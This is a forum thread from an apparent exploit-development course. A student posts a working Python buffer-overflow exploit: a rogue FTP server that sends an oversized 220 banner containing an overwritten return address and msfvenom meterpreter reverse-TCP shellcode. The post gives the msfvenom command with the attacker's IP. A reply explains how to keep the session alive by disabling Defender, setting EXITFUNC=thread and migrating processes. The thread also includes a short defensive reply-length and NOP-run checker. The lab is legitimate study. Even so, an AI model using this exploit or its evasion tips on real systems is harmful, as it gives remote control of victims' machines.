Session closed too fast

Hi guys,

I’m doing the buffer overflow lab (exploit the 32-bit FTP client).
I already have a working shell, but the session was terminated too fast.
Does anyone know how to get a more reliable shell for this kind of exploit?
Please guide me.

Below is my FTP server script. The Kali box has the IP 192.168.100.30. My victim machine has the IP 192.168.100.25.

#!/usr/bin/python

import socket
import struct

total_legth = 1200
offset = 989
new_eip = struct.pack("<I", 0x770CF8F7)
all_chars = b"\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"

buf =  b""
buf += b"\xbd\xb1\x49\xc7\xf3\xd9\xc2\xd9\x74\x24\xf4\x5a\x2b"
buf += b"\xc9\xb1\x59\x31\x6a\x14\x83\xc2\x04\x03\x6a\x10\x53"
buf += b"\xbc\x3b\x1b\x1c\x3f\xc4\xdc\x42\x71\x16\x55\x67\x15"
buf += b"\x1d\x34\x57\x5d\x73\xb5\x1c\x33\x60\xca\x95\xfe\xae"
buf += b"\xe5\x26\x75\xdc\x2d\xe9\x4a\x8d\x12\x68\x37\xcc\x46"
buf += b"\x4a\x06\x1f\x9b\x8b\x4f\xe9\xd1\x64\x1d\xbd\x92\x28"
buf += b"\xb2\xca\xe7\xf0\xb3\x1c\x6c\x48\xcc\x19\xb3\x3c\x60"
buf += b"\x23\xe4\xec\xf3\x6b\x1c\x87\x5c\x4c\x1d\x44\xd9\x45"
buf += b"\x69\x56\xab\x64\x6d\x2d\x1f\x0c\x90\xe7\x51\xd2\x52"
buf += b"\xc8\x9f\x7e\x55\x11\xa7\x9e\x23\x69\xdb\x23\x34\xaa"
buf += b"\xa1\xff\xb1\x2c\x01\x8b\x62\x88\xb3\x58\xf4\x5b\xbf"
buf += b"\x15\x72\x03\xdc\xa8\x57\x38\xd8\x21\x56\xee\x68\x71"
buf += b"\x7d\x2a\x30\x21\x1c\x6b\x9c\x84\x21\x6b\x78\x78\x84"
buf += b"\xe0\x6b\x6f\xb8\x09\x74\x90\xe4\x9d\xb8\x5d\x17\x5d"
buf += b"\xd7\xd6\x64\x6f\x78\x4d\xe3\xc3\xf1\x4b\xf4\x52\x15"
buf += b"\x6c\x2a\xdc\x76\x92\xcb\x1c\x5e\x51\x9f\x4c\xc8\x70"
buf += b"\xa0\x07\x08\x7c\x75\xbd\x02\xea\xb6\xe9\x77\xf4\x5e"
buf += b"\xeb\x77\x19\xc3\x62\x91\x49\xab\x24\x0e\x2a\x1b\x84"
buf += b"\xfe\xc2\x71\x0b\x20\xf2\x79\xc6\x49\x99\x95\xbe\x22"
buf += b"\x36\x0f\x9b\xb9\xa7\xd0\x36\xc4\xe8\x5b\xb2\x38\xa6"
buf += b"\xab\xb7\x2a\xdf\xcb\x37\xb3\x20\x7e\x37\xd9\x24\x28"
buf += b"\x60\x75\x27\x0d\x46\xda\xd8\x78\xd5\x1d\x26\xfd\xef"
buf += b"\x56\x11\x6b\x4f\x01\x5e\x7b\x4f\xd1\x08\x11\x4f\xb9"
buf += b"\xec\x41\x1c\xdc\xf2\x5f\x31\x4d\x67\x60\x63\x21\x20"
buf += b"\x08\x89\x1c\x06\x97\x72\x4b\x14\xd0\x8c\x09\x33\x79"
buf += b"\xe4\xf1\x03\x79\xf4\x9b\x83\x29\x9c\x50\xab\xc6\x6c"
buf += b"\x98\x66\x8f\xe4\x13\xe7\x7d\x95\x24\x22\x23\x0b\x24"
buf += b"\xc1\xf8\xbc\x5f\xaa\xff\x3d\xa0\xa2\x9b\x3e\xa0\xca"
buf += b"\x9d\x03\x76\xf3\xeb\x42\x4a\x40\xe3\xf1\xef\xe1\x6e"
buf += b"\xf9\xbc\xf2\xba"

payload = [
    b"220 ",
    b"A" * offset,
    #b"Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9",
    new_eip,
    #all_chars,
    #b"C" * (total_legth - offset - len(new_eip) - len(all_chars)),
    b"\x90"*16,
    buf,
    b"\r\n"
]
payload = b"".join(payload)
s = socket.socket()
s.bind(("0.0.0.0", 21))
s.listen(1)
print("[+] Listening on [FTP] 21")
c, addr = s.accept()

print("[+] Connection accepted from: %s" % (addr[0]))

#c.send(b"220 "+payload+ "\r\n")
c.send(payload)
c.recv(1024)
#c.close()
#print("[+] Client exploited !! quitting")
#.close()

The command that I used to generate the shellcode:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.100.30 LPORT=4444 -b "\x00" -f py

Here I got a message that the session is not valid and will be closed.

Thanks for reading.
PS: I created my own windows7_x32 box.
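Seen from the client side, the script above delivers everything in a single oversized `220` reply line. The following is an added example, not part of the original post: a bounded reader and a reply-line check that an FTP client or a network sensor could apply to that kind of banner. The 512-byte limit, the function names and the sample bytes are assumptions constructed for illustration.

```python
import io
import re

MAX_REPLY_LINE = 512                   # assumed policy limit, not a protocol constant
REPLY_CODE = re.compile(rb"^\d{3}[ -]")  # three-digit reply code, then space or hyphen
NOP_RUN = re.compile(rb"\x90{8,}")       # eight or more consecutive x86 NOP bytes

def read_reply(stream, limit=MAX_REPLY_LINE):
    """Read one reply line, refusing lines longer than the limit."""
    line = stream.readline(limit + 2)  # +2 leaves room for the CRLF
    if not line.endswith(b"\n"):
        raise ValueError("FTP reply exceeds %d bytes or is unterminated" % limit)
    return line

def inspect_ftp_reply(line):
    """Return a list of findings for one FTP control-channel reply line."""
    findings = []
    body = line.rstrip(b"\r\n")
    if not REPLY_CODE.match(body):
        findings.append("no-reply-code")
    if len(body) > MAX_REPLY_LINE:
        findings.append("overlong-line")
    # Reply text is normally printable ASCII; anything else is worth flagging.
    if any(b != 9 and not 32 <= b <= 126 for b in body):
        findings.append("non-printable-bytes")
    if NOP_RUN.search(body):
        findings.append("nop-run")
    return findings

# Constructed samples: a normal greeting, and a line with the same layout as
# the script's payload (filler, 4-byte address, NOP run, binary blob). The
# address and blob here are placeholder bytes, not working values.
BENIGN = b"220 Service ready for new user.\r\n"
SUSPECT = (b"220 " + b"A" * 989 + b"\xde\xad\xbe\xef"
           + b"\x90" * 16 + b"\xcc" * 64 + b"\r\n")

if __name__ == "__main__":
    for name, sample in (("benign", BENIGN), ("suspect", SUSPECT)):
        print(name, inspect_ftp_reply(sample))
        try:
            read_reply(io.BytesIO(sample))
            print("  bounded read: accepted")
        except ValueError as exc:
            print("  bounded read: rejected:", exc)
```

`read_reply` is the mitigation (never copy an unbounded server reply into a fixed buffer); `inspect_ftp_reply` is the detection side, usable on captured control-channel traffic.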

Did you turn off Windows Defender and any antivirus? Also, when exploiting, do you get kicked out of the Win7 32-bit machine you have, or is the machine you are getting kicked out of one of INE's? The first thing I would do is just a regular reverse shell, no meterpreter, with Windows. From there, see if it stays up. I would also throw EXITFUNC=thread in the msfvenom exploit. If the shell stays alive, try to do a shell to meterpreter in Metasploit. If the meterpreter session is closed, then it is most likely due to Defender. You also may need to migrate quickly to another running process.